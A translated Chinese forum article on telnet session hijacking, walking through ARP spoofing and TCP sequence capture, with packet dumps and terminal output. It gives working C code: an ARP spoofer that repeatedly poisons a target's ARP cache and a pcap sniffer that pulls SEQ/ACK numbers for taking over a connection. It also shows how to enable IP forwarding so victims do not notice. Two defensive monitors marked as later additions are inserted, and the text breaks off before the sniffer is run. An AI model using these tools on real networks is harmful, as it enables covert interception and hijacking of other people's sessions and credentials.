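[Attack and defense example] Session hijacking

Source: 西宁威势电子信息服务有限公司     Published: 2009-4-15    Views: 7221

Introduction to session hijacking

  Many systems' command-line logins are insecure today. Services such as telnet and rlogin communicate without encryption, so all of them can become targets for our attack. Because nothing is encrypted, the traffic is easily sniffed, and there is also "connection hijacking". Many tools of this kind circulate online; the most widespread is hunt, and there are also dns hijacker, juggernaut and others.

  Attack diagram:

     ______________                              _________________
    |              |         hijacking          |                 |
    |  Attacker A  |----------------------------| Hijacked host B |
    |______________|             |              |_________________|
      192.168.25.3               |                 192.168.25.4
                                 |
                            __________
                           |          |
                           |  Router  |
                           |__________|
                                 |
                                 |
                            __________
                           |          |
                           |  Router  |
                           |__________|
                                 |
                                 |
                                 |
                         _________________
                        |                 |
                        | External host C |  192.168.25.1
                        |_________________|

  A and B are in the same segment. When B connects to C, A will sniff the connection between B and C. First, A must ARP-spoof both B and C; the conversation between B and C then passes through A, and A can sniff it or hijack it. Many programs can do ARP spoofing; arpspoof in dsniff and arpspoof in arp-sk are both handy tools.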

Author: 陆哥   Reply date: 2003-5-24 3:12:00
  2. How ARP spoofing works

     _________________________________________________________________
    |                   |              |      |         |             |
    |  Destination MAC  |  Source MAC  | Type | Payload |  Checksum   |
    |___________________|______________|______|_________|_____________|

                              Ethernet Frame

     _______________________________________________________________
    |                               |                               |
    |         Hardware Type         |         Protocol type         |
    |---------------------------------------------------------------|
    |  HW addr lth  |  P addr lth   |            Op code            |
    |---------------------------------------------------------------|
    |                    Source hardware address                    |
    |---------------------------------------------------------------|
    |                    Source protocol address                    |
    |---------------------------------------------------------------|
    |                 Destination hardware address                  |
    |---------------------------------------------------------------|
    |                 Destination protocol address                  |
    |_______________________________________________________________|

                               Arp Message

  Below is an ARP packet I captured.
  
  
  
  Packet #1448, Direction: Out, Time:13:24:00.359, Size: 42
  Ethernet II
  Destination MAC: FF:FF:FF:FF:FF:FF        |
  Source MAC: 00:01:02:E1:35:84             |------------ Ethernet Frame
  Ethertype: 0x0806 (2054) - ARP            |
  ARP
  Hardware: 0x0001 (1) - Ethernet           |
  Protocol: 0x0800 (2048) - IP              |
  Hardware address length: 0x06 (6)         |
  Protocol address length: 0x04 (4)         |
  Operation: 0x0001 (1) - ARP Request       |------------ Arp Message
  Sender MAC address: 00:01:02:E1:35:84     |
  Sender IP address: 192.168.25.1           |
  Target MAC address: 00:00:00:00:00:00     |
  Target IP address: 192.168.25.3           |

  Raw Data:
  0x0000 FF FF FF FF FF FF 00 01-02 E1 35 84 08 06 00 01 ..........5.....
  0x0010 08 00 06 04 00 01 00 01-02 E1 35 84 C0 A8 19 01 ..........5.....
  0x0020 00 00 00 00 00 00 C0 A8-19 03                   ..........
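Now let's see how to obtain another machine's MAC on the local host. Why can we? Because every computer keeps an ARP cache that stores the MACs of the machines it already knows.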
  
   
  
   
  
  [root@chi chi]# /sbin/arp -e
   Address HWtype HWaddress Flags Mask Iface
  192.168.25.1 ether 00:01:02:E1:35:84 C eth0
  [root@chi chi]# ping 192.168.25.2
  PING 192.168.25.2 (192.168.25.2) from 192.168.25.3 : 56(84) bytes of data.
  Warning: time of day goes back (-795us), taking countermeasures.
  64 bytes from 192.168.25.2: icmp_seq=1 ttl=128 time=3.89 ms
  64 bytes from 192.168.25.2: icmp_seq=2 ttl=128 time=3.76 ms
  64 bytes from 192.168.25.2: icmp_seq=3 ttl=128 time=0.969 ms
  
  --- 192.168.25.2 ping statistics ---
  3 packets transmitted, 3 received, 0% loss, time 2014ms
  rtt min/avg/max/mdev = 0.969/2.876/3.897/1.350 ms
  [root@chi chi]# /sbin/arp -e
   Address HWtype HWaddress Flags Mask Iface
  192.168.25.1 ether 00:01:02:E1:35:84 C eth0
  192.168.25.2 ether 00:02:44:33:51:24 C eth0
  [root@chi chi]#
   
  
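  At first this machine had no MAC for 192.168.25.2, but after I pinged 192.168.25.2, arp showed the MAC of 192.168.25.2. When you connect to a machine, your computer checks the ARP cache for a MAC that matches the IP. If there is one, it is used for the connection; if not, an ARP request is sent to obtain the MAC. The computer does all of this automatically, so this ARP cache is what we will attack.

  Before ARP spoofing you must first find out the MAC of the IP you want to deceive, and of course your own MAC. Getting another machine's MAC uses the ioctl.h header; see the code below.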
  
   
  
  /********************************* arp_cache_lookup.c ***************************************/

  #include <stdio.h>
  #include <string.h>
  #include <unistd.h>
  #include <sys/types.h>
  #include <sys/socket.h>
  #include <netinet/in.h>
  #include <netinet/if_ether.h>
  #include <sys/ioctl.h>

  #include <libnet.h>

  /* Look up ip in the kernel ARP cache with the SIOCGARP ioctl.
     Returns 0 and fills *ether on success, -1 if there is no entry. */
  int arp_cache_lookup(in_addr_t ip, struct ether_addr *ether)
  {
      int sock;
      struct arpreq ar;
      struct sockaddr_in *sin;

      memset((char *)&ar, 0, sizeof(ar));

      /* the interface name is hard-coded */
      strncpy(ar.arp_dev, "eth0", sizeof(ar.arp_dev));

      sin = (struct sockaddr_in *)&ar.arp_pa;
      sin->sin_family = AF_INET;
      sin->sin_addr.s_addr = ip;

      /* any socket will do; it is only a handle for the ioctl */
      if ((sock = socket(AF_INET, SOCK_DGRAM, 0)) == -1)
      {
          printf("socket failt\n");
          return -1;
      }

      if (ioctl(sock, SIOCGARP, (caddr_t)&ar) == -1) {
          printf("no mac found\n");
          close(sock);
          return -1;
      }

      close(sock);
      memcpy(ether->ether_addr_octet, ar.arp_ha.sa_data, ETHER_ADDR_LEN);

      return 0;
  }

  int main(int argc, char *argv[])
  {
      in_addr_t target_ip;
      struct ether_addr target_mac;   /* real storage, not an uninitialized pointer */
      int c;

      if (argc != 2)
      {
          printf("./arp_cache_lookup <ip>\n");
          return 1;
      }

      memset(&target_mac, 0, sizeof(target_mac));
      target_ip = libnet_name_resolve(argv[1], 1);
      arp_cache_lookup(target_ip, &target_mac);

      printf("MAC address: ");
      for (c = 0; c < 6; c++)
      {
          printf("%02x", target_mac.ether_addr_octet[c]);
          if (c < 5)
              printf(":");
      }
      printf("\n");
      return 0;
  }

  /******************************************************************************/
Now let's run it:
  
   
  
  [root@chi chi]# gcc `libnet-config --defines` -o arp_cache_lookup arp_cache_lookup.c `libnet-config --libs`
  [root@chi chi]# ./arp_cache_lookup 192.168.25.2
  no mac found
  MAC address: 00:00:00:00:01:00 (no MAC in the cache)
  [root@chi chi]# ./arp_cache_lookup 192.168.25.1
  MAC address: 00:01:02:e1:35:84
  Aborted
  [root@chi chi]# ping 192.168.25.2
  PING 192.168.25.2 (192.168.25.2) from 192.168.25.3 : 56(84) bytes of data.
  64 bytes from 192.168.25.2: icmp_seq=1 ttl=128 time=3.75 ms
  64 bytes from 192.168.25.2: icmp_seq=2 ttl=128 time=2.50 ms
  
  --- 192.168.25.2 ping statistics ---
  2 packets transmitted, 2 received, 0% loss, time 1013ms
  rtt min/avg/max/mdev = 2.507/3.129/3.752/0.625 ms
  [root@chi chi]# ./arp_cache_lookup 192.168.25.2
  MAC address: 00:02:44:33:51:24 (now it is there)
  Aborted
  [root@chi chi]#
  
   
  
  So we first add a UDP socket that connects to the host, and then use arp_cache_lookup to check the cache; that gives you the MAC you want. Now let's look at the spoofed packet you are going to build.

  ARP reply packet

  Packet #65, Direction: In, Time:23:21:44.964, Size: 60
  Ethernet II
  Destination MAC: 00:01:02:E1:35:84        the target's MAC, here the MAC of 192.168.25.1
  Source MAC: 00:50:56:46:40:41             our own MAC, that of 192.168.25.3
  Ethertype: 0x0806 (2054) - ARP
  ARP
  Hardware: 0x0001 (1) - Ethernet
  Protocol: 0x0800 (2048) - IP
  Hardware address length: 0x06 (6)
  Protocol address length: 0x04 (4)
  Operation: 0x0002 (2) - ARP Response      this marks an ARP reply
  Sender MAC address: 00:50:56:46:40:41     our own MAC
  Sender IP address: 192.168.25.4           the IP we impersonate towards 192.168.25.1
  Target MAC address: 00:01:02:E1:35:84     the MAC of 192.168.25.1
  Target IP address: 192.168.25.1           the IP of the host being deceived
  Raw Data:
  0x0000 00 01 02 E1 35 84 00 50-56 46 40 41 08 06 00 01 ....5..PVF@A....
  0x0010 08 00 06 04 00 02 00 50-56 46 40 41 C0 A8 19 04 .......PVF@A....
  0x0020 00 01 02 E1 35 84 C0 A8-19 01 03 40 42 7D 00 40 ....5......@B}.@
  0x0030 40 86 04 08 00 00 00 00-98 90 02 42             @..........B

  Below is the arp_spoof program.
  
  /************************************************************************/
  #include <sys/types.h>
  #include <sys/param.h>
  #include <sys/socket.h>
  #include <sys/ioctl.h>
  #include <string.h>
  #include <signal.h>
  #include <net/if.h>
  #include <netinet/in_systm.h>
  #include <netinet/in.h>
  #include <netinet/if_ether.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <unistd.h>

  #include <libnet.h>
  #include <pcap/pcap.h>

  struct libnet_link_int *netif;
  struct ether_addr spoof_mac, target_mac;
  in_addr_t spoof_ip, target_ip;
  char *device;

  void usage(void)
  {
      printf("arp spoof\n");
      printf("./arp <target_ip> <spoof_ip>\n");
      exit(1);
  }

  /* Build one Ethernet + ARP frame and write it to the link layer.
     source_mac is always replaced by the hardware address of dev, so the
     ARP sender MAC is this host's MAC while source_ip is the claimed IP. */
  int
  send_arp_data(struct libnet_link_int *net, char *dev, int optie,
                u_char *source_mac, in_addr_t source_ip,
                u_char *dest_mac, in_addr_t dest_ip)
  {
      char ebuf[128];
      u_char pkt[60];

      if ((source_mac = (u_char *)libnet_get_hwaddr(net, dev, ebuf)) == 0)
          return -1;

      libnet_build_ethernet(dest_mac, source_mac, ETHERTYPE_ARP, NULL, 0, pkt);

      libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, 6, 4, optie, source_mac, (u_char *)&source_ip,
                       dest_mac, (u_char *)&dest_ip, NULL, 0, pkt + ETH_H);
      printf(" %s send arp reply to %s\n",
             libnet_host_lookup(source_ip, 0),
             libnet_host_lookup(dest_ip, 0));

      return (libnet_write_link_layer(net, dev, pkt, sizeof(pkt)) == sizeof(pkt));
  }

  /* Same ARP cache lookup as in arp_cache_lookup.c (SIOCGARP on eth0). */
  int arp_cache_lookup(in_addr_t ip, struct ether_addr *ether)
  {
      int sock;
      struct arpreq ar;
      struct sockaddr_in *sin;

      memset((char *)&ar, 0, sizeof(ar));
      strncpy(ar.arp_dev, "eth0", sizeof(ar.arp_dev));

      sin = (struct sockaddr_in *)&ar.arp_pa;
      sin->sin_family = AF_INET;
      sin->sin_addr.s_addr = ip;

      if ((sock = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
          return -1;

      if (ioctl(sock, SIOCGARP, (caddr_t)&ar) == -1)
      {
          close(sock);
          return -1;
      }

      close(sock);
      memcpy(ether->ether_addr_octet, ar.arp_ha.sa_data, 6);

      return 0;
  }

  /* Send an empty UDP datagram so that the kernel resolves dest_ip
     and puts its MAC into the ARP cache. */
  int arp_udp(in_addr_t dest_ip)
  {
      struct sockaddr_in sin;   /* a real structure, not an uninitialized pointer */
      int i, sock;

      if ((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0)
          return (0);

      memset(&sin, 0, sizeof(sin));
      sin.sin_family = AF_INET;
      sin.sin_addr.s_addr = dest_ip;
      sin.sin_port = htons(67);

      i = sendto(sock, NULL, 0, 0, (struct sockaddr *)&sin, sizeof(sin));

      close(sock);

      return (i == 0);
  }

  /* Try the ARP cache; if the entry is missing, trigger resolution and retry. */
  int arp_search(in_addr_t ip, struct ether_addr *ether)
  {
      int i = 0;

      do {
          if (arp_cache_lookup(ip, ether) == 0)
              return 0;

          arp_udp(ip);
          sleep(1);
      }
      while (i++ < 3);

      return 1;
  }

  int main(int argc, char *argv[])
  {
      int c;
      char ebuf[PCAP_ERRBUF_SIZE];

      device = NULL;
      spoof_ip = target_ip = 0;

      if (argc != 3)
          usage();

      target_ip = libnet_name_resolve(argv[1], 1);
      spoof_ip = libnet_name_resolve(argv[2], 1);

      if ((device = pcap_lookupdev(ebuf)) == NULL)
      {
          printf("no device found\n");
          exit(-1);
      }

      if ((netif = libnet_open_link_interface(device, ebuf)) == 0)
      {
          printf(" libnet_open_link_interface() error\n");
          exit(-1);
      }

      if ((arp_search(target_ip, &target_mac)) != 0)
      {
          printf("couldn't find arp for host %s\n",
                 libnet_host_lookup(target_ip, 0));
          exit(-1);
      }

      /* repeat the reply every 2 seconds so the cache entry stays overwritten */
      for (;;) {

          send_arp_data(netif, device, ARPOP_REPLY, NULL, spoof_ip, (u_char *)&target_mac, target_ip);
          sleep(2);
      }

      exit(1);
  }

  /**************************************************************************************/
[root@chi chi]# gcc `libnet-config --defines` -o arp arp.c `libnet-config --libs` -lpcap
  [root@chi chi]# ./arp
  arp spoof
  ./arp <target_ip> <spoof_ip>
  [root@chi chi]# ./arp 192.168.25.1 192.168.25.4
  192.168.25.4 send arp reply to 192.168.25.1
  192.168.25.4 send arp reply to 192.168.25.1
  192.168.25.4 send arp reply to 192.168.25.1
  192.168.25.4 send arp reply to 192.168.25.1
  192.168.25.4 send arp reply to 192.168.25.1
  ~c
  
  [root@chi chi]#
  
  I compiled the program above and spoofed 192.168.25.1. Below I compare the ARP table before and after the spoofing.
  
  *===============================================================
  欢迎使用 Microsoft Telnet 服务器。
  *===============================================================
  C:\>arp -a (before spoofing)
  
  Interface: 192.168.25.1 on Interface 0x4
  
  Internet Address Physical Address Type
  192.168.25.3 00-50-56-46-40-41 dynamic
  192.168.25.4 00-50-56-46-40-68 dynamic
  
  C:\>arp -a (after spoofing)
  
  Interface: 192.168.25.1 on Interface 0x4
  Internet Address Physical Address Type
  192.168.25.3 00-50-56-46-40-41 dynamic
  192.168.25.4 00-50-56-46-40-41 dynamic
  
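  Then spoof 192.168.25.4 as well. After that, all traffic between 192.168.25.3 and 192.168.25.1 passes through 192.168.25.3. Before doing so, however, we need to edit /proc/sys/net/ipv4/ip_forward. That way 192.168.25.3 and 192.168.25.1 will not notice that someone is listening.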
  
  
  [root@chi chi]# cat /proc/sys/net/ipv4/ip_forward
  0
  [root@chi chi]# cat >/proc/sys/net/ipv4/ip_forward
  1
  
  [root@chi chi]# cat /proc/sys/net/ipv4/ip_forward
  1
  [root@chi chi]#
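
The before/after arp -a output above is the signal a defender can watch for: the MAC recorded for 192.168.25.4 changes to the MAC already held by 192.168.25.3. The following C monitor is an added example, not code from the original article; it parses Ethernet/ARP frames and flags an IP whose sender MAC differs from the first one seen. All function and constant names are hypothetical; PAGE_REQUEST and PAGE_SPOOFED_REPLY are the raw bytes printed on this page, and LEGIT_REPLY is constructed from the MAC in the "before" table.

```c
/* Added example (not from the original article): passive ARP binding monitor. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define ARP_OK         0   /* binding is new or unchanged */
#define ARP_CHANGED    1   /* known IP announced with a different MAC */
#define ARP_MALFORMED -1   /* not an Ethernet/IPv4 ARP request or reply */
#define MAX_BINDINGS  64

struct arp_binding { uint8_t ip[4]; uint8_t mac[6]; };
struct arp_table   { struct arp_binding e[MAX_BINDINGS]; size_t n; };

static struct arp_table demo_table;

/* Constructed: genuine reply, 192.168.25.4 is at 00:50:56:46:40:68. */
static const uint8_t LEGIT_REPLY[42] = {
    0x00,0x01,0x02,0xE1,0x35,0x84, 0x00,0x50,0x56,0x46,0x40,0x68, 0x08,0x06, 0x00,0x01,
    0x08,0x00, 0x06,0x04, 0x00,0x02, 0x00,0x50,0x56,0x46,0x40,0x68, 0xC0,0xA8,0x19,0x04,
    0x00,0x01,0x02,0xE1,0x35,0x84, 0xC0,0xA8,0x19,0x01 };

/* From the page (Packet #1448): request sent by 192.168.25.1. */
static const uint8_t PAGE_REQUEST[42] = {
    0xFF,0xFF,0xFF,0xFF,0xFF,0xFF, 0x00,0x01,0x02,0xE1,0x35,0x84, 0x08,0x06, 0x00,0x01,
    0x08,0x00, 0x06,0x04, 0x00,0x01, 0x00,0x01,0x02,0xE1,0x35,0x84, 0xC0,0xA8,0x19,0x01,
    0x00,0x00,0x00,0x00,0x00,0x00, 0xC0,0xA8,0x19,0x03 };

/* From the page (Packet #65): 192.168.25.4 announced with 00:50:56:46:40:41. */
static const uint8_t PAGE_SPOOFED_REPLY[60] = {
    0x00,0x01,0x02,0xE1,0x35,0x84, 0x00,0x50,0x56,0x46,0x40,0x41, 0x08,0x06, 0x00,0x01,
    0x08,0x00, 0x06,0x04, 0x00,0x02, 0x00,0x50,0x56,0x46,0x40,0x41, 0xC0,0xA8,0x19,0x04,
    0x00,0x01,0x02,0xE1,0x35,0x84, 0xC0,0xA8,0x19,0x01, 0x03,0x40,0x42,0x7D,0x00,0x40,
    0x40,0x86,0x04,0x08,0x00,0x00,0x00,0x00,0x98,0x90,0x02,0x42 };

/* Validate an Ethernet II + ARP frame and copy out the sender MAC and IP. */
int parse_arp(const uint8_t *f, size_t len, uint8_t mac[6], uint8_t ip[4], uint16_t *op)
{
    const uint8_t *a;

    if (len < 42) return -1;                          /* 14 Ethernet + 28 ARP */
    if (f[12] != 0x08 || f[13] != 0x06) return -1;    /* Ethertype 0x0806 */
    a = f + 14;
    if (a[0] != 0x00 || a[1] != 0x01) return -1;      /* hardware: Ethernet */
    if (a[2] != 0x08 || a[3] != 0x00) return -1;      /* protocol: IP */
    if (a[4] != 6 || a[5] != 4) return -1;            /* address lengths */
    *op = (uint16_t)((a[6] << 8) | a[7]);
    if (*op != 1 && *op != 2) return -1;              /* request or reply only */
    memcpy(mac, a + 8, 6);
    memcpy(ip, a + 14, 4);
    return 0;
}

/* Record the sender binding of one frame and report whether it conflicts. */
int arp_observe(struct arp_table *t, const uint8_t *frame, size_t len)
{
    uint8_t mac[6], ip[4];
    uint16_t op;
    size_t i;

    if (parse_arp(frame, len, mac, ip, &op) != 0)
        return ARP_MALFORMED;
    for (i = 0; i < t->n; i++) {
        if (memcmp(t->e[i].ip, ip, 4) != 0)
            continue;
        /* The first-seen MAC is kept, so every repeated spoofed reply alerts. */
        return memcmp(t->e[i].mac, mac, 6) == 0 ? ARP_OK : ARP_CHANGED;
    }
    if (t->n < MAX_BINDINGS) {
        memcpy(t->e[t->n].ip, ip, 4);
        memcpy(t->e[t->n].mac, mac, 6);
        t->n++;
    }
    return ARP_OK;
}

/* Replay the sample frames; returns the verdict for the spoofed reply. */
int replay_samples(void)
{
    memset(&demo_table, 0, sizeof(demo_table));
    if (arp_observe(&demo_table, LEGIT_REPLY, sizeof(LEGIT_REPLY)) != ARP_OK)
        return ARP_MALFORMED;
    if (arp_observe(&demo_table, PAGE_REQUEST, sizeof(PAGE_REQUEST)) != ARP_OK)
        return ARP_MALFORMED;
    return arp_observe(&demo_table, PAGE_SPOOFED_REPLY, sizeof(PAGE_SPOOFED_REPLY));
}

int main(void)
{
    int verdict = replay_samples();
    printf("spoofed reply verdict: %s\n",
           verdict == ARP_CHANGED ? "binding changed (alert)" : "no alert");
    return 0;
}
```

On a real network the same check is what static ARP entries or switch-level ARP inspection enforce; a host-side monitor like this only reports the change.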
How session hijacking works

  Tcp Protocol :

   0     4           8            16    19     24                      32
   -------------------------------------------------------------------------
   |           Source Port            |         Destination Port          |
   -------------------------------------------------------------------------
   |                            Sequence Number                            |
   -------------------------------------------------------------------------
   |                         Acknowledgment Number                         |
   -------------------------------------------------------------------------
   | HLEN | Reserved |    Code Bits   |              Window               |
   -------------------------------------------------------------------------
   |             Checksum             |          Urgent Pointer           |
   -------------------------------------------------------------------------
   |                    Options                     |       Padding        |
   -------------------------------------------------------------------------
   |                                 Data                                  |
   -------------------------------------------------------------------------

  Contents of the TCP segment:

   Source Port: the port on the source host
   Destination Port: the port on the destination host
   Sequence number: in a SYN, the sequence number is in fact the initial sequence number
   Acknowledgment Number: if the ACK control bit is set, this value is the sequence number of the packet the sender is ready to receive
   Hlen: indicates where the data begins
   Control Bits:

   URG: Urgent Pointer;
   ACK: Acknowledgment;
   PSH: Push Function;
   RST: Reset the connection;
   SYN: Synchronize sequence numbers;
   FIN: No more data from sender;

   Window: the window
   Checksum: the checksum
   Urgent Pointer: the urgent pointer
   Options:

  Next, let's capture 3 TCP packets.
  
  ===========================================================================
Packet #4, Direction: In, Time:14:35:43.954, Size: 74
  
  TCP
  Source port: 1028
  Destination port: 23
  Sequence: 0x5AE82A25 (1525164581) <----- SEQ is clientnr
  Acknowledgement: 0x00000000 (0)
  Header length: 0x0A (10) - 40 bytes
  Flags: SYN <----- Flags, sent from the client.
  URG: 0
  ACK: 0
  PSH: 0
  RST: 0
  SYN: 1
  FIN: 0
  Window: 0x16D0 (5840)
  Checksum: 0x1E28 (7720) - correct
  Urgent Pointer: 0x0000 (0)
  TCP Options
  Maximum Segment Size: 0x05B4 (1460)
  Sack-Permitted
  Timestamps
  Value: 0x0001D690 (120464)
  Echo Reply: 0x00000000 (0)
  Window Scale: 0x00 (0)
  Data length: 0x0 (0)
  
  
  ============================================================================
  
  Packet #5, Direction: Out, Time:14:35:43.964, Size: 78
  
  TCP
  Source port: 23
  Destination port: 1028
  Sequence: 0xC9CB8F02 (3385560834) <---- SEQ is servernr
  Acknowledgement: 0x5AE82A26 (1525164582) <---- ACK is clientnr+1
  Header length: 0x0B (11) - 44 bytes
  Flags: SYN ACK <---- Flags: SYN ACK
  URG: 0
  ACK: 1
  PSH: 0
  RST: 0
  SYN: 1
  FIN: 0
  Window: 0x4470 (17520)
  Checksum: 0x5C34 (23604) - correct
  Urgent Pointer: 0x0000 (0)
  TCP Options
  Maximum Segment Size: 0x05B4 (1460)
  Window Scale: 0x00 (0)
  Timestamps
  Value: 0x00000000 (0)
  Echo Reply: 0x00000000 (0)
  Sack-Permitted
  Data length: 0x0 (0)
  
  
  ============================================================================
  
  Packet #6, Direction: In, Time:14:35:43.964, Size: 66
  
  TCP
  Source port: 1028
  Destination port: 23
  Sequence: 0x5AE82A26 (1525164582) <---- SEQ is clientnr+1
  Acknowledgement: 0xC9CB8F03 (3385560835) <---- ACK is servernr+1
  Header length: 0x08 (8) - 32 bytes
  Flags: ACK <---- Flags: ACK
  URG: 0
  ACK: 1
  PSH: 0
  RST: 0
  SYN: 0
  FIN: 0
  Window: 0x16D0 (5840)
  Checksum: 0xF40D (62477) - correct
  Urgent Pointer: 0x0000 (0)
  TCP Options
  Timestamps
  Value: 0x0001D690 (120464)
  Echo Reply: 0x00000000 (0)
  Data length: 0x0 (0)
  
  ============================================================================
Packet 1: Client -> Server
  
   flags: SYN
  
   SEQ : clientnr 1525164581
  
  Packet 2: Server -> Client
  
   flags: SYN, ACK
  
  
   SEQ : servernr 3385560834
  
   ACK : clientnr+1 1525164582
  
  Packet 3: Client -> Server
  
   flags: ACK
  
   SEQ : clientnr+1 1525164582
  
   ACK : servernr+1 3385560835
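
The handshake arithmetic summarized above, as an added example that is not part of the original article: a C decoder for the fixed 20-byte TCP header that checks three segments against the clientnr+1 / servernr+1 rule, which is the state a monitor has to track to notice a segment that does not fit the session. The header bytes are constructed from the decoded fields of packets #4 to #6 on this page (options omitted); FORGED_ACK is a constructed variant with the acknowledgment number off by one, and all function names are hypothetical.

```c
/* Added example (not from the original article): decode the fixed TCP header
   and check the three-way handshake arithmetic shown on the page. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define F_FIN  0x01
#define F_SYN  0x02
#define F_RST  0x04
#define F_ACK  0x10
#define F_MASK (F_FIN | F_SYN | F_RST | F_ACK)

struct tcp_fixed {
    uint16_t sport, dport;
    uint32_t seq, ack;
    uint8_t  hlen_words;   /* header length in 32-bit words */
    uint8_t  flags;        /* the six code bits */
    uint16_t window;
};

/* Constructed from the page's decoded packets #4, #5 and #6. */
static const uint8_t PKT4_SYN[20] = {
    0x04,0x04, 0x00,0x17, 0x5A,0xE8,0x2A,0x25, 0x00,0x00,0x00,0x00,
    0xA0,0x02, 0x16,0xD0, 0x1E,0x28, 0x00,0x00 };
static const uint8_t PKT5_SYNACK[20] = {
    0x00,0x17, 0x04,0x04, 0xC9,0xCB,0x8F,0x02, 0x5A,0xE8,0x2A,0x26,
    0xB0,0x12, 0x44,0x70, 0x5C,0x34, 0x00,0x00 };
static const uint8_t PKT6_ACK[20] = {
    0x04,0x04, 0x00,0x17, 0x5A,0xE8,0x2A,0x26, 0xC9,0xCB,0x8F,0x03,
    0x80,0x10, 0x16,0xD0, 0xF4,0x0D, 0x00,0x00 };
/* Constructed: like packet #6 but acknowledging servernr+2 (checksum zeroed). */
static const uint8_t FORGED_ACK[20] = {
    0x04,0x04, 0x00,0x17, 0x5A,0xE8,0x2A,0x26, 0xC9,0xCB,0x8F,0x04,
    0x80,0x10, 0x16,0xD0, 0x00,0x00, 0x00,0x00 };

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* Sequence numbers live modulo 2^32, so 0xFFFFFFFF + 1 wraps to 0. */
uint32_t seq_add(uint32_t seq, uint32_t n) { return seq + n; }

uint32_t tcp_seq(const uint8_t *hdr) { return be32(hdr + 4); }

/* Decode the fixed part of a TCP header; -1 if too short or HLEN < 5. */
int parse_tcp_fixed(const uint8_t *p, size_t len, struct tcp_fixed *h)
{
    if (len < 20) return -1;
    h->sport = be16(p);
    h->dport = be16(p + 2);
    h->seq = be32(p + 4);
    h->ack = be32(p + 8);
    h->hlen_words = (uint8_t)(p[12] >> 4);
    h->flags = (uint8_t)(p[13] & 0x3F);
    h->window = be16(p + 14);
    return h->hlen_words >= 5 ? 0 : -1;
}

/* 1 if the three headers form one consistent handshake, 0 if not, -1 on parse error. */
int check_handshake(const uint8_t *syn, const uint8_t *synack, const uint8_t *ack)
{
    struct tcp_fixed c, s, a;

    if (parse_tcp_fixed(syn, 20, &c) || parse_tcp_fixed(synack, 20, &s) ||
        parse_tcp_fixed(ack, 20, &a))
        return -1;
    if ((c.flags & F_MASK) != F_SYN) return 0;
    if ((s.flags & F_MASK) != (F_SYN | F_ACK)) return 0;
    if ((a.flags & F_MASK) != F_ACK) return 0;
    if (s.sport != c.dport || s.dport != c.sport) return 0;   /* reverse direction */
    if (a.sport != c.sport || a.dport != c.dport) return 0;   /* client again */
    return s.ack == seq_add(c.seq, 1) &&      /* ACK = clientnr+1 */
           a.seq == seq_add(c.seq, 1) &&      /* SEQ = clientnr+1 */
           a.ack == seq_add(s.seq, 1);        /* ACK = servernr+1 */
}

int main(void)
{
    printf("page handshake consistent: %d\n",
           check_handshake(PKT4_SYN, PKT5_SYNACK, PKT6_ACK));
    printf("forged ACK consistent:     %d\n",
           check_handshake(PKT4_SYN, PKT5_SYNACK, FORGED_ACK));
    return 0;
}
```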
   
  
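  The above is the exchange that opens a TCP/IP conversation. To hijack a connection, finding the conversation's SEQ and ACK is the most important step. Once you have found them, you can use them to build the TCP packet you want to send and get the peer host to act on it. The code below demonstrates how to find the SEQ and ACK of a conversation.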
  
   
  
   
  
  /*****************************get_seq_ack.c***************************************/

  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <libnet.h>
  #include <pcap/pcap.h>
  #include <signal.h>
  #include <unistd.h>
  #include <sys/socket.h>
  #include <arpa/inet.h>

  #define TELNET 23

  u_long src_ip, dst_ip, src_port, dst_port;
  u_long seq, ack;

  /* Capture with pcap until a pure-ACK TCP segment from src_ip to
     dst_ip:dst_port is seen, then print its SEQ and ACK. */
  void get_seq_ack(u_long src_ip, u_long dst_ip, u_long src_port, u_long dst_port)
  {
      pcap_t *p;
      char errbuf[PCAP_ERRBUF_SIZE];
      u_char *buf;
      struct ip iphd;
      struct tcphdr tcphd;
      int ethrhdr = 0;
      char *device;

      if ((device = pcap_lookupdev(errbuf)) == NULL)
      {
          printf("could not found interface\n");
          exit(-1);
      }
      else
          printf("device = %s\n", device);

      if ((p = pcap_open_live(device, 65535, 1, 60, errbuf)) == 0)
      {
          printf("pcap_open_live: %s\n", errbuf);
          exit(-1);
      }

      if (pcap_datalink(p) == DLT_EN10MB)
          ethrhdr = 14;               /* length of the Ethernet II header */

      printf("Connection form %s to %s \n",
             libnet_host_lookup(src_ip, 0),
             libnet_host_lookup(dst_ip, 0));
      printf("wait for SEQ/ACK :\n");

      for (;;)
      {
          struct pcap_pkthdr pkthdr;

          buf = (u_char *) pcap_next(p, &pkthdr);
          if (!buf)
              continue;

          /* decode the IP header and keep only TCP from src_ip to dst_ip */
          memcpy(&iphd, buf + ethrhdr, sizeof(iphd));
          if (iphd.ip_p != IPPROTO_TCP)
              continue;
          if ((iphd.ip_src.s_addr != src_ip) || (iphd.ip_dst.s_addr != dst_ip))
              continue;

          /* decode the TCP header and keep only the wanted destination port */
          memcpy(&tcphd, buf + ethrhdr + sizeof(iphd), sizeof(tcphd));
          if (tcphd.th_dport != htons(dst_port))
              continue;
          src_port = tcphd.th_sport;

          /* only a segment whose flags are exactly ACK is reported */
          if (tcphd.th_flags != TH_ACK)
              continue;

          printf("Got packet! SEQ = 0x%lx ACK = 0x%lx\n",
                 (u_long)ntohl(tcphd.th_seq), (u_long)ntohl(tcphd.th_ack));
          pcap_close(p);

          printf("source_port is %d\n", ntohs(src_port));
          printf("dest_port is %d\n", (int)dst_port);
          return;
      }
  }

  int main(int argc, char *argv[])
  {
      if (argc < 3)
      {
          printf(" get_seq_ack.c\n");
          printf("./get_seq_ack <source_ip> <dest_ip>\n");
          exit(-1);
      }

      src_ip = inet_addr(argv[1]);
      dst_ip = inet_addr(argv[2]);
      dst_port = TELNET;

      get_seq_ack(src_ip, dst_ip, src_port, dst_port);

      return 0;
  }

  /***********************************************************************************/
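This program was adapted from existing code. It uses pcap to capture packets and decodes each captured packet; when it meets one with the ACK flag, it extracts the SEQ and ACK from that packet.

  Try the program out and find the SEQ and ACK: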
  
   
  
